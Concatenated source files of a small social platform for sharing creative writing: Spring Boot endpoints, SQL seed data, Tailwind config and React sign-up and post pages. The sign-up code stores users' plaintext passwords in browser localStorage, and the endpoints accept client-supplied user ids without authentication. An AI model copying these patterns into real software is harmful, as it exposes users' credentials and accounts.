@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> updateUserProfile(@RequestBody UpdateProfileData updateProfileData) {
try {
var res = userRepository.updateUserProfile(updateProfileData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/users/sendviewrequest")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> sendViewRequest(@RequestBody SendViewRequestData sendViewRequestData) {
try {
var res = viewRequestRepository.sendViewRequest(sendViewRequestData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
if (e.getMessage() != null && e.getMessage().contains("view_requests_pk"))
return new ResponseEntity<>("{\"reason\":\"only_once\"}", HttpStatus.ALREADY_REPORTED);
else
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/commenton")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> commentOnPost(@RequestBody CreateCommentData commentData) {
try {
var res = postRepository.commentOnPost(commentData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/reacton")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> reactOnPost(@RequestBody ReactOnPostData reactionData) {
try {
var res = postRepository.reactOnPost(reactionData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
if (e.getMessage() != null && e.getMessage().contains("post_reactions_pk"))
return new ResponseEntity<>("{\"reason\":\"only_once\"}", HttpStatus.ALREADY_REPORTED);
else
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/createpost")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> createPost(@RequestBody CreatePostData postData) {
try {
var res = postRepository.createNewPost(postData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@DeleteMapping("/posts/setseen")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> setPostSeen(@RequestBody SetSeenData setSeenData) {
try {
var res = postRepository.setPostSeen(setSeenData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/savepost")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> setPostSaved(@RequestBody SavePostData savePostData) {
try {
var res = postRepository.addSavedPost(savePostData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
if (e.getMessage() != null && e.getMessage().contains("saved_posts_pk"))
return new ResponseEntity<>("{\"reason\":\"only_once\"}", HttpStatus.ALREADY_REPORTED);
else
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@DeleteMapping("/posts/deleteviewrequest")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> setViewReqSeen(@RequestBody ViewRequestSeenData vrSeenData) {
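// NOTE: currently a stub; the request body is accepted but no view request is actually deleted.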
return new ResponseEntity<>(HttpStatus.OK);
}
}
<file_sep>-- Ranks
insert into ranks(description, num_stars) values
('Beginner', 0),
('Rookie', 1),
('Novice', 2),
('Intermediate', 3),
('Pro', 4),
('Expert', 5);
-- Privacy details
insert into privacy_details(show_interests, show_name, show_bio) values
(true, true, true), (true, true, false), (true, false, true), (true, false, false),
(false, true, true), (false, true, false), (false, false, true), (false, false, false);
-- Interest tags
insert into interest_tags(description) values
('poetry'), ('prose'), ('short_stories'), ('idle_thoughts'), ('parody'), ('jokes'), ('nature');
insert into interest_tags(description) values ('compositions');
-- Insert reactions
insert into reactions values
(1, 'Like', 'positive'),
(2, 'Dislike', 'negative');
-- For test:
truncate post_reactions;
insert into post_reactions values (2, 1, 1, false);
update profiles set npos_reacts = 0 where user_id = 2;<file_sep>module.exports = {
future: {
// removeDeprecatedGapUtilities: true,
// purgeLayersByDefault: true,
},
purge: [],
theme: {
customForms: theme => ({
dark: {
'input, textarea, multiselect, checkbox, radio': {
backgroundColor: theme('colors.gray.900'),
},
select: {
backgroundColor: theme('colors.gray.600'),
},
},
sm: {
'input, textarea, multiselect, select': {
fontSize: theme('fontSize.sm'),
padding: `${theme('spacing.1')} ${theme('spacing.2')}`,
},
select: {
paddingRight: `${theme('spacing.4')}`,
},
'checkbox, radio': {
width: theme('spacing.3'),
height: theme('spacing.3'),
},
}
}),
},
variants: {},
plugins: [
require('@tailwindcss/ui'),
require('@tailwindcss/custom-forms')
],
}
<file_sep># Writer's Kalice
## About
Writer's Kalice is a social media platform built exclusively for sharing creative writing (compositions, poems, short stories, and more) and getting feedback on it.
## Server-side
The server side uses Spring Boot along with PostgreSQL as its database management system.
## Client-side
The client side uses React and Tailwind CSS.
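Throughout the React code the server's base URL is imported as `serverUrl` from a small `appconfig` module. A minimal sketch of what that module might export is shown below; the file path, host, and port are assumptions for local development, not values taken from this repository.
```js
// src/appconfig.js (hypothetical sketch): central place for the API base URL.
// The host and port below are assumptions; point this at wherever the Spring Boot server runs.
const serverUrl = 'http://localhost:8080';

export default serverUrl;
```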
<file_sep>package com.writerskalice.server.models.getmodels;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import lombok.Setter;
import java.util.Date;
@AllArgsConstructor
@NoArgsConstructor
public class ViewRequestPost extends Post {
@Getter
@Setter
private String sentbyUsername;
/*@Getter
@Setter
private Date sentOn;*/
}<file_sep>import React from 'react';
import ReactDOM from 'react-dom';
import { Router, Route } from 'react-router-dom';
import { createBrowserHistory } from 'history';
import { TransitionGroup, CSSTransition } from 'react-transition-group';
import Landing from './App';
import SignUpPage from './SignUpPage';
import Feed from './Feed';
import NewPostPage from './NewPost';
import ProfileSettingsPage from './ProfileSettingsPage';
import ViewRequestsPage from './ViewRequestsPage';
import PostDisplayPage from './PostDisplayPage';
import * as serviceWorker from './serviceWorker';
import SavedPostsPage from './SavedPostsPage';
import SeenPostsPage from './SeenPostsPage';
const history = createBrowserHistory();
ReactDOM.render(
<React.StrictMode>
<Router history={history}>
<Route exact path="/" component={Landing} />
<Route path="/signup" component={SignUpPage} />
<Route path="/feed" component={Feed} />
<Route path="/write" component={NewPostPage} />
<Route path="/profileSettings" component={ProfileSettingsPage} />
<Route path="/viewRequests" component={ViewRequestsPage} />
<Route path="/post" component={PostDisplayPage} />
<Route path="/savedPosts" component={SavedPostsPage} />
<Route path="/seenPosts" component={SeenPostsPage} />
</Router>
</React.StrictMode>,
document.getElementById('root')
);
// If you want your app to work offline and load faster, you can change
// unregister() to register() below. Note this comes with some pitfalls.
// Learn more about service workers: https://bit.ly/CRA-PWA
serviceWorker.unregister();
<file_sep>import React from 'react';
import logo from './public/assets/logo.png';
import './css/build/tailwind.css';
import serverUrl from './appconfig';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import { useHistory } from 'react-router-dom';
import { tagToId } from './utils';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export class InterestTag extends React.Component {
constructor(props) {
super(props);
this.state = {
checked: false
};
this.handleCheck = this.handleCheck.bind(this);
this.handleUncheck = this.handleUncheck.bind(this);
}
handleCheck() {
this.setState(state => ({
checked: true,
}));
this.props.onCheck();
}
handleUncheck() {
this.setState({
checked: false,
});
this.props.onUncheck();
}
render() {
if (!this.state.checked) {
return (
<div className="xl:w-2/3 md:w-2/3 mt-2" onClick={this.handleCheck}>
<div className="border border-gray-300 font-sans hover:border-indigo-600 px-6 py-3 rounded-lg">
<h2 className="text-base text-gray-900 title-font">{this.props.itemText}</h2>
</div>
</div>
);
}
else {
return (
<div className="xl:w-2/3 md:w-2/3 mt-2" onClick={this.handleUncheck}>
<div className="bg-indigo-700 border border-indigo-700 hover:border-white px-6 py-3 rounded-lg">
<h2 className="text-base text-white title-font">{this.props.itemText}</h2>
</div>
</div>
);
}
}
}
class SignUpPage extends React.Component {
constructor(props) {
super(props);
this.state = {
isAboveEighteen: true,
showBio: true,
showName: true,
interestTags: [],
name: '',
username: '',
email: '',
password: '',
bio: '',
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleOptions = this.handleOptions.bind(this);
this.handleSubmit = this.handleSubmit.bind(this);
}
handleSubmit() {
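// Send the collected sign-up form state to the server; on success, cache the credentials
// and user id in localStorage and redirect to the feed.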
console.log(this.state);
fetch(serverUrl + "/users/createuser", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: this.state.username,
password: this.state.password,
name: this.state.name,
email: this.state.email,
bio: this.state.bio,
isAboveEighteen: this.state.isAboveEighteen,
showInterestTags: false,
showName: this.state.showName,
showBio: this.state.showBio,
tags: this.state.interestTags.map((tag) => tagToId(tag)),
})
}).then(response => {
if (response.status == 200) {
window.localStorage.setItem('wKusername', this.state.username);
window.localStorage.setItem('wKpassword', this.state.password);
response.json().then((data) => {
console.log(data)
if (data.success) {
window.localStorage.setItem('wKuid', data.userId);
this.setState({
successText: 'Signed up successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);
}
else {
this.setState({
errorText: 'Could not sign up!',
failedSnkOpen: true,
});
}
});
}
else {
this.setState({
errorText: 'Sign up failed!',
failedSnkOpen: true,
});
}
});
/*this.setState({
successText: 'Signed up successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);*/
}
addTag(interest) {
console.log(this.state.interestTags);
this.setState(state => {
const interestTags = state.interestTags.concat(interest);
return {
interestTags: interestTags
};
});
}
removeTag(interest) {
console.log(this.state.interestTags);
function arrayRemove(arr, value) {
return arr.filter(function (elem) {
return elem != value;
});
}
this.setState(state => ({
interestTags: arrayRemove(state.interestTags, interest)
}));
}
handleOptions(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
render() {
return (
<div className="flex flex-col bg-gray-800">
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-2 sm:px-6 lg:px-8">
<div className="relative flex items-center justify-between h-16">
<div className="absolute inset-y-0 left-0 flex items-center sm:hidden">
{/* Mobile menu button*/}
</div>
<div className="flex-1 flex items-center justify-center sm:items-stretch sm:justify-start">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden sm:block sm:ml-6">
</div>
</div>
<div className="absolute inset-y-0 right-0 flex items-center pr-2 sm:static sm:inset-auto sm:ml-6 sm:pr-0">
<button className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700 transition duration-150 ease-in-out" aria-label="Notifications">
{/* Heroicon name: bell */}
</button>
{/* Profile dropdown */}
<div className="ml-3 relative">
<div>
</div>
{/*
Profile dropdown panel, show/hide based on dropdown state.
Entering: "transition ease-out duration-100"
From: "transform opacity-0 scale-95"
To: "transform opacity-100 scale-100"
Leaving: "transition ease-in duration-75"
From: "transform opacity-100 scale-100"
To: "transform opacity-0 scale-95"
*/}
<div className="hidden origin-top-right absolute right-0 mt-2 w-48 rounded-md shadow-lg">
</div>
</div>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Menu open: "block", Menu closed: "hidden"
*/}
<div className="hidden sm:hidden">
</div>
</nav>
<main className="profile-page">
<section className="relative block h-1/3" style={{ height: 300 + 'px' }}>
<div className="absolute top-0 w-full bg-center bg-cover">
<p className="text-white mt-6 text-3xl text-center">Sign Up</p>
<div className="flex mt-4 justify-center">
<div className="w-16 h-1 rounded-full bg-purple-500 inline-flex"></div>
</div>
<span id="blackOverlay" className="w-full h-full absolute opacity-50 bg-gray-900"></span>
</div>
</section>
<section className="relative py-24 bg-gray-800">
<div className="container mx-auto px-4">
<div
className="relative flex flex-col min-w-0 break-words bg-white w- mb-6 shadow-2xl rounded-lg -mt-64">
{/*<h1 className="mt-16 text-3xl font-semibold" style="padding-left: 5.5rem;">Sign Up</h1>*/}
<section className="text-gray-700 body-font relative px-5">
<div className="container px-5 mb-5 mx-auto flex sm:flex-no-wrap flex-wrap">
<div
className="lg:w-5/12 md:w-5/12 sm:w-5/12 bg-white flex flex-col md:ml-auto w-full md:py-8 mt-8 md:mt-0">
<p className="font-semibold text-lg mb-6 mt-2">Login Details</p>
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="Name" type="text" name="name" onChange={this.handleOptions} />
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="Email" type="email" name="email" onChange={this.handleOptions} />
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="Username" name="username" onChange={this.handleOptions} />
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="<PASSWORD>" type="<PASSWORD>" name="password" onChange={this.handleOptions} />
<p className="font-semibold text-lg mb-2 mt-2">About Me</p>
<p className="font-thin mb-4">A short description about yourself.</p>
<textarea
className="bg-white rounded border border-gray-400 focus:outline-none h-32 focus:border-purple-500 text-base px-4 py-2 mb-4 resize-none"
placeholder="Bio" name="bio" onChange={this.handleOptions}></textarea>
<div className="block">
<p className="font-semibold text-lg mb-2 mt-2">A few more things:</p>
<div className="mt-2">
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox text-indigo-600" checked={this.state.isAboveEighteen} onChange={this.handleOptions} name="isAboveEighteen" />
<span className="ml-2 font-thin">I am more than 18 years old (for content tailoring)</span>
</label>
</div>
<p className="mt-4 mb-2">Privacy options</p>
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox text-green-500" checked={this.state.showName} onChange={this.handleOptions} name="showName" />
<span className="font-thin ml-2">Show my name to others</span>
</label>
</div>
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox text-pink-600" checked={this.state.showBio} onChange={this.handleOptions} name="showBio" />
<span className="font-thin ml-2">Show my bio to others</span>
</label>
</div>
</div>
</div>
<button
className="text-white bg-purple-500 border-0 mt-6 py-2 px-6 focus:outline-none hover:bg-purple-600 rounded text-lg" onClick={this.handleSubmit}>Sign Up</button>
<p className="text-xs text-gray-500 mt-3">By signing up, you agree with our <a
href="#" className="text-indigo-500 hover:text-indigo-800">terms of
service.</a></p>
</div>
{/* Interests */}
<div
className="lg:w-5/12 md:w-1/2 sm:w-5/12 sm:ml-10 bg-white flex flex-col md:ml-auto w-full md:py-8 mt-8 md:mt-0">
<p className="font-semibold text-lg mb-1 mt-2">Interests</p>
<p className="font-thin leading-5">Select the topics you're interested in.</p>
<p className="font-thin mb-4">This will help us personalize your feed.</p>
{/* Interest Cards */}
<InterestTag onCheck={() => this.addTag("prose")} onUncheck={() => this.removeTag("prose")} itemText="Prose" />
<InterestTag onCheck={() => this.addTag("poetry")} onUncheck={() => this.removeTag("poetry")} itemText="Poetry" />
<InterestTag onCheck={() => this.addTag("short_stories")} onUncheck={() => this.removeTag("short_stories")} itemText="Short stories" />
<InterestTag onCheck={() => this.addTag("compositions")} onUncheck={() => this.removeTag("composition")} itemText="Compositions" />
<InterestTag onCheck={() => this.addTag("idle_thoughts")} onUncheck={() => this.removeTag("idle_thoughts")} itemText="Idle thoughts" />
<InterestTag onCheck={() => this.addTag("jokes")} onUncheck={() => this.removeTag("jokes")} itemText="Jokes" />
<InterestTag onCheck={() => this.addTag("parody")} onUncheck={() => this.removeTag("parody")} itemText="Parody" />
<InterestTag onCheck={() => this.addTag("nature")} onUncheck={() => this.removeTag("nature")} itemText="Nature" />
</div>
</div>
</section>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
</div>
</div>
</section>
</main>
</div>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}
export default SignUpPage;<file_sep>import React from 'react';
import serverUrl from './appconfig';
import './css/build/tailwind.css';
import PopupMenuList from './PopupMenuList';
import Post from './Post';
import { Link } from 'react-router-dom';
import logo from './public/assets/logo.png';
import Button from '@material-ui/core/Button';
import TextField from '@material-ui/core/TextField';
import Dialog from '@material-ui/core/Dialog';
import DialogActions from '@material-ui/core/DialogActions';
import DialogContent from '@material-ui/core/DialogContent';
import DialogContentText from '@material-ui/core/DialogContentText';
import DialogTitle from '@material-ui/core/DialogTitle';
import Comment from './Comment';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export default class PostDisplayPage extends React.Component {
constructor(props) {
super(props);
this.state = {
thisUserComment: ' ',
thisAnonymousComment: false,
thisUserPositiveComment: true,
sendVrToUsername: '',
vrDialogOpen: false,
comments: [
// Sample data
{
content: "Glossier echo park pug, church-key sartorial biodiesel vexillologist pop-up snackwave ramps cornhole. Marfa 3 wolf moon party messenger bag selfies, poke vaporware kombucha lumbersexual pork belly polaroid hoodie portland craft beer.",
postedbyUsername: "sachett",
anonymous: false
},
{
content: "Glossier echo park pug, church-key sartorial biodiesel vexillologist pop-up snackwave ramps cornhole. Marfa 3 wolf moon party messenger bag selfies, poke vaporware kombucha lumbersexual pork belly polaroid hoodie portland craft beer.",
postedbyUsername: "sachett",
anonymous: true
},
{
content: "Glossier echo park pug, church-key sartorial biodiesel vexillologist pop-up snackwave ramps cornhole. Marfa 3 wolf moon party messenger bag selfies, poke vaporware kombucha lumbersexual pork belly polaroid hoodie portland craft beer.",
postedbyUsername: "sachett",
anonymous: false
}
],
post: {
postedbyUsername: '(Loading...)',
title: '(Loading...)',
postedbyBio: '(Loading...)',
postedDate: '(Loading...)',
content: '(Loading...)',
anonymousPost: false,
nnegReactions: 0,
nposReactions: 0,
},
liked: null,
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleOptions = this.handleOptions.bind(this);
this.handleWrite = this.handleWrite.bind(this);
}
componentDidMount() {
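// If the post was opened from the feed, mark it as seen; then load the post,
// the author's public profile, and finally the comments.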
console.log("hey!");
console.log(this.props.location.query.fromFeed);
if (this.props.location.query.fromFeed == true)
fetch(serverUrl + "/posts/setseen", {
method: 'DELETE',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.location.query.postId,
})
})
fetch(serverUrl + '/posts/getpost?postId=' + this.props.location.query.postId, { method: 'GET' })
.then((response => response.json()))
.then((data) => {
console.log(data);
this.setState({
post: {
postedbyUsername: data.postedbyUsername,
content: data.content,
title: data.title,
postedDate: data.postedOn.toString(),
anonymousPost: data.anonymous,
nnegReactions: data.nnegReactions,
nposReactions: data.nposReactions
}
})
console.log(this.state.post.postedbyUsername);
// now get the author profile
fetch(serverUrl + '/users/getprofiledisplay?username=' + data.postedbyUsername) // use the freshly fetched username; setState may not have applied yet
.then((response) => response.json())
.then((data) => {
this.setState((state) => {
return {
post: {
postedbyUsername: state.post.postedbyUsername,
content: state.post.content,
title: state.post.title,
postedDate: state.post.postedDate,
anonymousPost: state.post.anonymousPost,
nnegReactions: state.post.nnegReactions,
nposReactions: state.post.nposReactions,
postedbyBio: data.showBio ? data.bio : '(Not permitted to be shown)'
}
}
})
// finally, get the comments too
this.retrieveComments()
});
});
}
retrieveComments() {
fetch(serverUrl + '/posts/getcomments?postId=' + this.props.location.query.postId)
.then((response) => response.json())
.then((data) => {
console.log(data);
this.setState({
comments: data
})
});
}
handleWrite() {
window.setTimeout(() => this.props.history.push('/write'), 10);
}
handleLike() {
if (this.state.liked != null) {
return;
}
fetch(serverUrl + '/posts/reacton', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
reactedbyUid: window.localStorage.getItem("wKuid"),
reactedonPid: this.props.location.query.postId,
reactionId: 1, // reaction id 1 is for like
})
}).then((response) => {
if (response.status == 200) {
this.setState((state) => {
return {
post: {
postedbyUsername: state.post.postedbyUsername,
content: state.post.content,
title: state.post.title,
postedDate: state.post.postedDate,
anonymousPost: state.post.anonymousPost,
nnegReactions: state.post.nnegReactions,
nposReactions: state.post.nposReactions + 1,
postedbyBio: state.post.postedbyBio,
},
liked: true,
successSnkOpen: true,
successText: 'You liked the post!',
}
});
}
else {
response.json()
.then((data) => {
if (data.reason == 'only_once') {
this.setState({
failedSnkOpen: true,
errorText: "You've reacted on this already!",
});
}
else {
this.setState({
failedSnkOpen: true,
errorText: "Failed to like!",
});
}
})
}
}).catch(() => {
this.setState({
failedSnkOpen: true,
errorText: 'Failed to like the post!',
});
});
}
handleDislike() {
if (this.state.liked != null) {
return;
}
fetch(serverUrl + '/posts/reacton', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
reactedbyUid: window.localStorage.getItem("wKuid"),
reactedonPid: this.props.location.query.postId,
reactionId: 2, // reactions id 2 is for dislike
})
}).then((response) => {
if (response.status == 200) {
this.setState((state) => {
return {
post: {
postedbyUsername: state.post.postedbyUsername,
content: state.post.content,
title: state.post.title,
postedDate: state.post.postedDate,
anonymousPost: state.post.anonymousPost,
nnegReactions: state.post.nnegReactions + 1,
nposReactions: state.post.nposReactions,
postedbyBio: state.post.postedbyBio,
},
liked: false,
warnSnkOpen: true,
warnText: 'You disliked the post.',
}
});
}
else {
response.json()
.then((data) => {
if (data.reason == 'only_once') {
this.setState({
failedSnkOpen: true,
errorText: "You've reacted on this already!",
});
}
else {
this.setState({
failedSnkOpen: true,
errorText: "Failed to dislike!",
});
}
})
}
}).catch(() => {
this.setState({
failedSnkOpen: true,
errorText: 'Failed to dislike the post!',
});
});
}
handlePostComment() {
console.log(this.state.thisAnonymousComment);
fetch(serverUrl + '/posts/commenton', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
content: this.state.thisUserComment,
isPositive: this.state.thisUserPositiveComment,
isAnonymous: this.state.thisAnonymousComment,
postedbyUid: window.localStorage.getItem("wKuid"),
postedonPid: this.props.location.query.postId,
})
}).then((response) => {
if (response.status == 200) {
this.retrieveComments();
}
else {
this.setState({
failedSnkOpen: true,
errorText: 'Failed to comment!',
});
}
})
}
handleSavePost() {
console.log({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.location.query.postId,
});
fetch(serverUrl + '/posts/savepost', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.location.query.postId,
})
}).then((response) => {
if (response.status == 200) {
this.setState({
successSnkOpen: true,
successText: 'Post saved to collection!',
});
}
else {
response.json()
.then((data) => {
if (data.reason == 'only_once') {
this.setState({
failedSnkOpen: true,
errorText: "You've saved this already!",
});
}
else {
this.setState({
failedSnkOpen: true,
errorText: "Failed to save to collection!",
});
}
})
}
})
}
handleSendVR() {
console.log({
postId: this.props.location.query.postId,
usernameToSend: this.state.sendVrToUsername,
sentbyUid: window.localStorage.getItem("wKuid")
});
fetch(serverUrl + '/users/sendviewrequest', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
postId: this.props.location.query.postId,
usernameToSend: this.state.sendVrToUsername,
sentbyUid: window.localStorage.getItem("wKuid")
})
}).then((response) => {
if (response.status == 200) {
this.setState({
successText: "View request sent!",
successSnkOpen: true,
vrDialogOpen: false,
})
}
else {
this.setState({
errorText: "Failed to send view request!",
failedSnkOpen: true,
vrDialogOpen: true,
})
}
})
}
handleOptions(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
render() {
return (
<div className="flex flex-col bg-gray-800">
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div className="flex items-center justify-between h-16">
<div className="flex items-center">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden md:block">
<div className="ml-10 flex items-baseline space-x-4">
<Link to="/feed" ><a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a></Link>
<Link to="/savedPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Saved Posts</a>
</Link>
<Link to="/seenPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Seen Posts</a>
</Link>
</div>
</div>
</div>
<div className="hidden md:block">
<div className="ml-4 flex items-center md:ml-6">
{/*<button
className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700"
aria-label="Notifications">
<svg className="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M15 17h5l-1.405-1.405A2.032 2.032 0 0118 14.158V11a6.002 6.002 0 00-4-5.659V5a2 2 0 10-4 0v.341C7.67 6.165 6 8.388 6 11v3.159c0 .538-.214 1.055-.595 1.436L4 17h5m6 0v1a3 3 0 11-6 0v-1m6 0H9" />
</svg>
</button>*/}
<button className="text-white bg-indigo-600 border-0 py-2 px-6 focus:outline-none hover:bg-indigo-700 rounded justify-center text-lg" onClick={this.handleWrite}>
Write
</button>
{/* Profile dropdown */}
<div className="ml-3 mt-1 relative">
<PopupMenuList name='User' onLogout={this.handleLogout} onVR={this.handleVR} onProfile={this.handleProfileSettings} />
</div>
</div>
</div>
<div className="-mr-2 flex md:hidden">
{/* Mobile menu button */}
<button
className="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:bg-gray-700 focus:text-white">
{/* Menu open: "hidden", Menu closed: "block" */}
<svg className="block h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
